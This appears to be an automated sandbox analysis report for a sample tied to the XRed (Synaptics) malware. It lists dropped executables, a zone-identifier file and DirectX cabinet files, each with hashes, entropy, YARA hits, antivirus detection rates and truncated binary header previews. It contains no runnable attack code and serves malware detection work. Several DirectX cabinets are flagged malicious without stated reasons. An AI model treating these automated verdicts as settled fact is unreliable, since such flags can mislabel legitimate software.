                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658828" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                              C:\ProgramData\Synaptics\RCX8506.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:modified
                                                                                              Size (bytes):771584
                                                                                              Entropy (8bit):6.6264053582391735
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IIr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                              MD5:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              SHA1:B48603F6A1DFFAB2FF458780025F6A3C2E523C3C
                                                                                              SHA-256:1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                                                                                              SHA-512:38334452808E5D203B287E2F4A47B8F5BBCE1ED18FABCFA4A61B8C04429150DFBFFE2241323B3C87D90ABBABBED49A5CEA584CC1CE83BF519BB728E1D6AC18EB
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX8506.tmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX8506.tmp, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 94%
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                              C:\ProgramData\Synaptics\Synaptics.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1059840
                                                                                              Entropy (8bit):7.037746245684915
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:6nsJ39LyjbJkQFMhmC+6GD9DukDF4zARUwSp:6nsHyjtk2MYC5GDFuRzmUd
                                                                                              MD5:EABA5B2C3B6607177112EC5F26438BA3
                                                                                              SHA1:D0572BAD54FACA6AF612763C6835FEB160A3DCD2
                                                                                              SHA-256:43555B4A8BD82ABD7E7B1F279B4F31AFB5A230CE4246BE6FDA4FDD5E7263C780
                                                                                              SHA-512:B767A6F167A0153628AE0BDB468EEF4D4311E48A58FF4774843EE36321C48823A24BE5C9D0D399800A19733A46EAD5109CD54E728E6A260107212647A5F60D9C
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                              C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\APR2007_xinput_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 47342 bytes, 5 files, at 0x44 +A "xinput1_3_x86.cat" +A "xinput1_3.dll", flags 0x4, ID 8235, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):56510
                                                                                              Entropy (8bit):7.973777529821975
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:BcnwcwzHEdb27WH2SfZDNu75ddnVR+ZFaNk0ZKn4:4wb+2eZonQwt
                                                                                              MD5:B362EC93463D8B6381A864D35D38C512
                                                                                              SHA1:7CE47EBCEDA117D8B9748B5B2D3A6AE99FC239DF
                                                                                              SHA-256:B6C1166C57D91AFEEEAA745238D0D6465FF2084F0606FD29FAF1BFA9E008A6C5
                                                                                              SHA-512:CC57733912E2A296A11CD078372C3B43F1256A93EC5BECD0D1B520EB210FCE60938AA1CAA6DBBCA03292A05495B5ECD212EE5F77E3EBABB11EF31F1975B2D09E
                                                                                              Malicious:false
                                                                                              Preview:MSCF...........D...............+ ..............#...................(.........6{. .xinput1_3_x86.cat.h?...(.....6.. .xinput1_3.dll......h.....6G. .apr2007_xinput_x86.inf......m.....6G. .xinput1_3_x86.inf./....p.....6G. .xinput1_3_x86_xp.inf.i...T5..CK.y<.....Y.d..H.<3.1....=...`,cbB.f...*R*kB..V..E...,.[$I.R(~g..n........}....<....y>.9.s.....f*&.s)E.F..Cp ..Q...D 0<0.;....R.....3.\...4...F.1QI...........@..O....2.f....I\...a...c4.0.....,...0.!..6.. M...@..:..ocp.A.K6......... .F..!...[....+..,...0n...<..@cl`+Xe^.X.t.$.;{X@.P....@d..N=.....Z..g....&...#...%]....~.........C. #..u...h(.4^.4.... a.a...*#.Z<....%.{..5..n$....P@[..C<01..Y...F.\..[.H.H.l..f.l.X.0...l.4.A....+B.~.|.l.YO0..k}i>~V..O.f...M0n^.?..B..........a.......N.w/==J.{..D@0..Q.....%..@6..Z.|......@@.4..a.....q......t....4v....dI.Ym..^...........[7.XH.8Y.nR..d.<.;O.."k...d.y2aV..4....D...5..B".H~.....+x_o.4....c.#.`..0...v.F4........I.Q$.....x....._..;]...O[....l....?..:.......Q._....2.;.~...NXz

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Apr2006_d3dx9_30_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1109261 bytes, 5 files, at 0x44 +A "d3dx9_30_x86.cat" +A "d3dx9_30.dll", flags 0x4, ID 6903, number 1, extra bytes 20 in head, 74 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1118429
                                                                                              Entropy (8bit):7.999050518080374
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:OreyPa6AC8e290lruGDhi3TSvHDh+ISNvRNhPmJ0RRuu:cNoeYEuTSvjh+R3WKRv
                                                                                              MD5:B3D644A116C54AFDA42A61B0058BE112
                                                                                              SHA1:9AF7DDC29EEF98810A1A2F85DB0B19B2EC771437
                                                                                              SHA-256:CA7B9C6A49E986C350147F00A6C95C5B577847B5667B75681A1EE15E3A189106
                                                                                              SHA-512:A2D2F12B7B37BD8F5C8465DD13AD31942DF11EE5ED5423DEEEB178E6B594587706D2C5116258BE1562CAA5ECA691358AF3CB83B77898D1012FF521017D199165
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............J..............44f .d3dx9_30_x86.cat..p$........4.e .d3dx9_30.dll......$....4.e .apr2006_d3dx9_30_x86.inf.....z.$....4.e .d3dx9_30_w9x.inf.....+.$....4.e .d3dx9_30_x86.inf.v..[>..CK..X.K..=.. ....+..MBI.. M@.n..QH0....#....c..b/..{.z....E..y.......N8?gg..{..=..{...W..;..:....IA.....a.`.......43GX..r..,.f...+FA..,.....2..a0..2......Z.ty.Ih...m0w..es0Ww.[/.n%q.Z.I...ho......#...G.....\.. 1.P6....;.s.cZ.......t.B...X...LL..X.C.......B.......~......@..!..8..O..O..!mR..fbb.0.8L.f..XO.R.-......Y...y...Q4."5JD...p..s.T.f.2z.6..~...........9VPR.f.BH=.bg.s,.T.!=......O..........B...||}...X..5]R.0.....c.+.4..S....E.7.y...[....3...2$..:qt...7T......Q..@X..Ji...q.Z8.Ea(..@zS.D.3;.b..a.}L.;..PG/-....(...../vL_...@K....c..&....f..y.....3.8fW:.T:N7..W:..t.t...#(.FK.k..X..&...;_...Be.w.....b6.z<..za..}_7.afQ......O{,..Thu...).'+..0{:.V}kI.&Z.JU&&*...B..[.'..t.vK.9.`]..!.)Vht.8e.\.T.....i......I.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Apr2007_d3dx10_33_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 689905 bytes, 6 files, at 0x44 +A "d3dx10_33_x86.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 9049, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):699073
                                                                                              Entropy (8bit):7.998968028413629
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SHwziN1v34WzSc6IA6ajvY8ov8ZdReUTQ8Mr47JYCophIa9sNDn1QcILtw6:V01wWzCI3ajjls4NpAsNDnMw6
                                                                                              MD5:F784B8A0FD84C8AC3F218A9842D8DA56
                                                                                              SHA1:FB7B4B0F81CD5F1C6A900C71BFD4524AF9A79ECE
                                                                                              SHA-256:949068035CE57BBB3658217EC04F8DE7A122C6E7857B6F8B0CA002EB573DF553
                                                                                              SHA-512:01B818AA5188CDE3504E289AEDCA2D31A6C5AED479B18A2C78271828AE04BEBCD4082051B7F4EECA8A31E8EE5ADBA158420ECDCB21371C735E4781EE5F661DBF
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............Y#..............#..............1....).........6{. .d3dx10_33_x86.cat.p%...)....l6O. .d3dcompiler_33.dll.h...2O....o6=. .d3dx10_33.dll............6E. .apr2007_d3dx10_33_x86.inf.I...7......6E. .d3dx10_33_x86.inf.i..........6E. .d3dx10_33_x86_xp.inf..j"(.2..CK.y<...........l.al..)e.!a.&...l3.-.h....j.,."D.R..O...%W).gFn........}.z5..<s..s>.s>..|...U*x...Z..!..E..U...<$.....y0.sPH)....<..<.4.M.@...U.......\).@..6.'.Yi.!.....R.@.&..X..i..z..Y....`...C...).Cz...p.9H$...t@....I.s....;.[.C+A"..<.7.w3..A..u...s8$....ma.Y5.3.e C.e.yAAP ...@L..8.,?..h.a..E2=..9=.......e5|a./3B"q....Zh.P...6P.."....k....:.w..:.h%.....H.0u......+..D.+!..-...9.sD...O...QZ.a..8v#......Q..N..l%....c..?P..........>.....~......0.F.VB!1ii..v5.4.R.R.....LX.X.........w.8.'.~..p.8.......A......6w.\...~..[.B.E.!..h....uQR..q.....O.....R......Cth-.....$z..B..00.l.Uo.. '..m..fB..}...ij....<..RX._......k .k1.xH......A3y.<~V>.s^gV.8+.;+...CP..+. &.....PH..).UA{...E..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Aug2006_xinput_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40098 bytes, 4 files, at 0x44 +A "xinput1_2_x86.cat" +A "xinput1_2.dll", flags 0x4, ID 6335, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49266
                                                                                              Entropy (8bit):7.9632460736333766
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:OuG396sAA1wXXvVFc2755DkphtVmUkt/lnkvH0odpl/q1nk:vwQsAhFcSmpJ3kt/xcd7ek
                                                                                              MD5:16B968CA0C435EE45E77A84C2D0364A9
                                                                                              SHA1:90B17A60A34F6335787A6B2D489CBCD3A4EA98C8
                                                                                              SHA-256:6DD7C0ABE37D3DF7AA6DB7BB352260F4A15DC965FF9D30AA32FE9595C1A18300
                                                                                              SHA-512:3BBBFDF8B5673641EC066C3FB52E6B0D5CE0BC6ED6BFF17AB4AC3FA69A8628B09E5EC8322FC39D2A206974B54D297CAAFF9410197E26D090FE74F963CD535045
                                                                                              Malicious:false
                                                                                              Preview:MSCF............D................................#.............................4.R .xinput1_2_x86.cat............4.K .xinput1_2.dll............4}R .aug2006_xinput_x86.inf............4}R .xinput1_2_x86.inf.....>..CK.|.\SG..M.. @...mTT.0.(..D..M...+K0 ..D.`...T.Zkk.Am.V..k...V[l...+....*Z4....P..........&w.3g.9..\.Kz<tp..N.;.]Y...%=.!...b.............%v_88.t`qXK.;......B..3..c.8...................a...aA..C..)t...FP.q.%......'.B...("...D0.(..Al(..BY.<..."...s.!...1....&."...a..;6;h.P.#.X...p.H....c..q,..1.'..^.CL..h.C..h.%......f...S.l.'h.p.p.E.......\..G..1..'.)D>.Cd.JB..u.....6..i..A.>...&.......]..J....C..h."........x.......4....0.H.?..P.=.Z"zEaJU...F./...Y.t...~.o.y9<..9.l..7=.9_..d...!.r.F0...4..c2...a.3..y0..B..nD<.K...s!d.9|...p.0|a.U.a.=x.v$.OM.1u{...qQ,..._.R....y..f"...33...@... ......[..1.a.....0.x8..@.N.`i..0...b..c.wYs.L>&..9..A.......UXL.n..8x.....z......W+..... o.'.v.r...$g....R...4.u.r..J.P+......./o:C...Sg.g.&.3r..^.vG.v^...I.s...9..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Aug2007_d3dx10_35_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 790907 bytes, 6 files, at 0x44 +A "d3dx10_35_x86.cat" +A "d3dcompiler_35.dll", flags 0x4, ID 9055, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):800075
                                                                                              Entropy (8bit):7.9986813742013325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:iTo6mZ4UtaxS5hNsXjnUQEnnR62vSNE6xr8M6:iTdwtqAUXjU7nQaSNvxo
                                                                                              MD5:DDC4AF0D53B477E5AF77942E7118B66E
                                                                                              SHA1:81AD8201DCF653A6E977C4506A274D0BAC12643C
                                                                                              SHA-256:9536166EE7CC1100CFE24E01532E8E4DEED6BAA838B4C025581F2CA046A25915
                                                                                              SHA-512:1E082D7E7855BC0AF6EC09D4A69FD4A1B0A3A31E4DE8FAA52FA0BDCD601C501ADA6216DDDB83058F37AB4A371068E0F344BDF42F2551943BE19BD719D99BA93C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....{.......D..............._#..........{....#..............8....).........6P. .d3dx10_35_x86.cat.p....).....6. .d3dcompiler_35.dll.h...2......6. .d3dx10_35.dll.c..........6F. .aug2007_d3dx10_35_x86.inf.I..........6F. .d3dx10_35_x86.inf.i...F......6F. .d3dx10_35_x86_xp.inf.. ......CK.y8............H.<3.1....=...`.&&[...m^...&D.l.%Z.TJ).....%.R..L...z.....{u]..<...y.....qn...e5\..1.1.....L.b.*D".x~....4....@0.....@#XD>D&.].T..........K..,.<(.81A.z.]..A....0.......Y.l......F[.C...R.`...8...$...A....2..8-..F..e.=j.J.ud..dM.I.........!.h..l.+..,....t9..r..!_h.D.. ..,3..hQsQnYE.+V.wL....;.....3#B"...Zh'...........2.Hx.....:2.%......:.&..'... .!.H.%.<..Tj......A3C.W..e....Dpe...]....!....&H.....I..~d...$C }.>.#...}3....X}.F..G!1....r6...WD.....L}.K..t.....)#...6.L.&...........)....9.!p.b....x.....{..f........s.a.U..^..,..3?.............Ck.....!.s.......`.oZk............K[i.g.....E7...f.7f...`.....3...F.....i.?K&.....d.,Yk.L...........,.L...D.Au..].8.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Aug2008_d3dx10_39_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843207 bytes, 6 files, at 0x44 "d3dx10_39.dll" "D3DCompiler_39.dll", flags 0x4, ID 8952, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):852375
                                                                                              Entropy (8bit):7.998886184584254
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:E6Ih4DqlkwAjhr1mB+uYgrCvCZNmJ9ndKo4XYbX:E664DQkwAj/oNCvCZIdN4ID
                                                                                              MD5:5380053AC4C344BD38604022476B1C1D
                                                                                              SHA1:043DC8F49BCA3BF0BD85E858F5C2EEDF68565C0D
                                                                                              SHA-256:84800C55F773D5D6913E344E41BABA58CF07CEC2E6C7114CA3BF48E8F355419F
                                                                                              SHA-512:F3CE2DEF6E2E8A1D2C07F627E3C437A1BBA0B2E456020A84121346472BE3D28E0FC69623BD408F35A2C639C83DD2787F998DEDFE42B7625DC71500824B035FEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................"...............#..............=....$.........8 X..d3dx10_39.dll......$.....8.X..D3DCompiler_39.dll.f(..(......8.2..d3dx10_39_x86.cat.I..........8.2..d3dx10_39_x86.inf.i..........8.2..d3dx10_39_x86_xp.inf.c...@......8.2..Aug2008_d3dx10_39_x86.inf.,"..%,..CK..\.....\./.R3...$...Hef.K0..D<....V..uvA4.J.yTx..YjvY..<.2.133.J.[...O.g.Q.J..gf.....r^.}..s~g..3...F..!...eB>$.e .~..Z.j@V....C]..-..-N.!.Dc.c2.lv..!0b......$&.n.....yH..cz./...|...w.;y../+.......l.|~...?...{..-<Us.(n..M.U...(Bz.I.WCc.q.I..uuu....2O.K}.~_x...P..B.D.P.].C-e..O..x.tJ.....Y....'o5%dE...+..../..".tp...Ap..i^.$.0W.....!...b../.W..y.B.....#.m.k}O.k..z...N........W.3.......S.F..].E..j,.;.xe..I`6p.V..._O..K`.H.C....f.....'..3@?@O..`...@&p..P...W..>HO.....,..CA........0...m.....D....0.....x.S...l.....'....`.....%....{....1y.t...Qp.t..{..A.0c.......k.....@!x......RA/.....@c......}...n.......`.x.L.cA...A ...P..S....2}{%".,....d8..^.K..p.xGE...+..\`:X.>.G.o.Y

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Jun2005_d3dx9_26_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1058965 bytes, 5 files, at 0x44 +A "d3dx9_26_x86.cat" +A "d3dx9_26.dll", flags 0x4, ID 6937, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1068133
                                                                                              Entropy (8bit):7.999040217820951
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NxFMsUF1MmwONoWu85w6SFBu+vveJ0sut3z2A1s9z/D8gigA:V3dm3NoW+9FBhuJ9ut36A1s9z78giP
                                                                                              MD5:029359EBCA4BA5945282E0C021B26102
                                                                                              SHA1:6107919F51E1B952CA600F832A6F86CBBED064B5
                                                                                              SHA-256:C44EABF5BE3B87CD845950670C27F6A1E5D92B7758BA7C39C7849B1EE1C649C0
                                                                                              SHA-512:FA007F257F5267119B247EC4ED368E51FD73E6AEA3097E2FC4E78078C063AF34D161FD1BDCAF3097BB575D2614DBA226A624D060009EE4F7BEDA697EFCF42BB7
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....(......D............................(...#..............G...7..........2b} .d3dx9_26_x86.cat...#.7......2Z| .d3dx9_26.dll......,#....2.} .d3dx9_26_w9x.inf......-#....2.} .d3dx9_26_x86.inf......0#....2.} .jun2005_d3dx9_26_x86.inf...N..>..CK..X....'.. ..P.....&!. .%.A........`.....;v..WTd..........w......{.{..<'...3..;}....=Xv3.e.vc:.yg.i.....1.....V.F.:.fMj ,.|.e.....F..5#?.|6.M.j[Z..k3.....g.f.B(..=v......a<.7..a.=.:...h.f.X6.."..I..I......Od:.!9......~1.H..q.....'....y..\...E..u.S|K.a...:c..B..8g:!?._..E:.A.H...N.a..j..~pI.....V.k.l.W.....X..........`4.2(.....e.>...0...!L..>p.....2d..r<...afffPK.6..t0.V.'HA.....j.o...5B+. .....hy...... M..5t...K.<>..@.G........~h..Xw.B.....F~>.?l..7..].}Xp.m.!......x~6.aY_*.rmH..sr.."Q*..]..d3.{.bXX`P....io...AZ.i..$..1....Gl.....d..AM:6.......p./(..Q.1..1..q....O.c~.c........04...|s3...}..x..I.r..).m.K1.o#.Q.Fa...X7.baY......G{......Z5S.HU..c.tp.z6.4m.B=P...d.6...g.....W..aM...z...L.R.W%...z.F.n.5....54EG.R

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Mar2008_d3dx10_37_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 812300 bytes, 6 files, at 0x44 "d3dx10_37.dll" "D3DCompiler_37.dll", flags 0x4, ID 8943, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):821468
                                                                                              Entropy (8bit):7.9989494569533655
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:k8Yjgk28yEYvDLX3XmZcLHo9yLvTJqnrT+LprnNjjjGM6pdKi814DYnciABrI55V:1Yjp/yEcfLI9y4rORNYdKibxBrIS6
                                                                                              MD5:8234B9B90BCBB5077E1B5FAA0B66D1A9
                                                                                              SHA1:E9207C572FDEC592B7C17A7F9C6F875C8A55B1F0
                                                                                              SHA-256:6A2727269E6CAC7C4D2E316333D29BAC0DC1CD7F51C36C0C08B0388203DEDAD2
                                                                                              SHA-512:74C94A6E092D7C828FC1E3FAEE4B21917AFC3CACEC04F260754190D0533F93A58289763AC620E5A577F7865902023B30548CDA4D9E968C90EE13050AD6D1E8C5
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....e......D................"...........e...#..............:.............E8...d3dx10_37.dll...........e8....D3DCompiler_37.dll.f(..(.....e8K...d3dx10_37_x86.cat.I.........e8....d3dx10_37_x86.inf.i.........e8....d3dx10_37_x86_xp.inf.c...@.....e8....Mar2008_d3dx10_37_x86.inf...-..,..CK..\TU........[fz.,P..0}Q.a.L...T..`.f.;........i..io{n.*...ej.i.Yb........;w....r.....s...9.<g.%f.4.F.q...F.*"_zr.........6.4}..I.8.;o..9L..j.9.43..Z.....M`rl&..A.....n.b..Q.....;..).).MK{J...!...1..T'....:..&...,*O.k\.!}4.d.vH/5.0.....x-!.....{.c..@......Dm53SG.W..A..5..MK..P.?ZK64'd..%.4p......'..v.a-..3!...iYM...Jc.B.i..^.4.;.....b....:..i..'Ui{2.$m.t(w..w...Km..ZrM:..7g.p.w.m$..k..`..n..7JK.`...%..O..d..`....@2h.j.s.ZR.V....?..p-i.:../...@.X.&..:RK..y`"p.. ...a..\.@Y..l...<0.lB|6.d...Ac..N..=`.(..@.._.....)...`(....\..|....@.~i..-....z}.........]..'.........<0...d...A.h......e..@...6....,.....D0..A....A8...@K.a..6/.\.&t.$/.V.I.....f.".....t.$.....H..X.6....$

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Mar2009_d3dx10_41_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1034785 bytes, 6 files, at 0x44 "d3dx10_41.dll" "D3DCompiler_41.dll", flags 0x4, ID 8914, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1043953
                                                                                              Entropy (8bit):7.998757160305283
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JAEjuCeK6JgAkPBJoBgsqDP8FbGACV0L/sW0G+vv2:JFuCeVJqyxqDUFb9CV8r
                                                                                              MD5:45E83CBA5710A1DE7D3990A288122E85
                                                                                              SHA1:23C4BFBDDCFB11ACB7C47C409825F039AF7EB908
                                                                                              SHA-256:B7DA29103CDF374DE0C09713CB985035EAC45FB8B394D3B8157D8A7562A89899
                                                                                              SHA-512:8C56D376D349AA00948E1F3C6168DADE76AC9A26ADE1AAC5A385DCF0253602F5A2973483D083425195DB6AD7717494FD3CF674F5549774AC608CEFA2A88BF0A7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....!.......D................"..........!....#..............G...P.........i:k{..d3dx10_41.dll.h-..P.....i:k{..D3DCompiler_41.dll.......#...p:.r..d3dx10_41_x86.cat.I...a4#...p:.r..d3dx10_41_x86.inf.i....7#...p:.r..d3dx10_41_x86_xp.inf.c....:#...p:.r..Mar2009_d3dx10_41_x86.inf.Nn.>.0..CK.wT.I..{.G.C.QQ.#(I.T`..Q.........0.b..5`Xs..bD.@..f1.9..x....Yw..{...s..U...[.kjj.....h3...TV2.nFx92?~=....m.l.[n.[..(81)]..R&..Sd...J.,F!Se..Re..A..e..~}..b.e[.fd.np.+..[......R;.z.....v....N.~...ibx.h.S.....W...7..-.a.8...`...$u..A.0K....j1..g..A.^k1...Pj.]bm.ym..~t...+d..`*..LG}..X...#.J.....;'e.Z.-.2..m.0....[W..#......j.05.Z.R.!..:.jd..e.........O..7:...\....k..bY...s4W).. ..%.......:g............p..Z...... ..<5.2..].... ..X.,..!~.0...v..k.c.1.2..V.10.L.#.R.x.=.S.9.....27.S@.....d.* .p.l.d......}.\...;.e./.0 ...&.~...8.\...:.L;.'....R..."`;p.....>...........BhW6.I&..D.!.3`...M...>u.....S.A......E@...0.P..@8....v.9....X@..."e....'..`c...(...^..R.'p...4....{ ...f...2....h

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\APR2007_xinput_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 90857 bytes, 6 files, at 0x44 +A "xinput1_3_x64.cat" +A "xinput1_3.dll", flags 0x4, ID 9350, number 1, extra bytes 20 in head, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100025
                                                                                              Entropy (8bit):7.988437274786544
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:Mt5OSvuXSf2rbZu4Kmsr4eLRwPC5B9y7q:MTOBXSSpFI4/PM/ye
                                                                                              MD5:FAE84E0773A74F367124C6D871516B7B
                                                                                              SHA1:CAF8B9D7D4AF965BF445D052D1E835B680D6BBC3
                                                                                              SHA-256:86EE073C199B5080FE4F5BE6AC24BB1117FEA42E4BBCD828B4F0EC26C669B22C
                                                                                              SHA-512:CAF1381CAE7417B57FAEF56D0023BF90C90406748F8813AB85C687DDB81E2498D2F1D5F4BC154903FD5A19836E6F245CD6F5D3927A383F1ACC3BCC41B58FD09B
                                                                                              Malicious:false
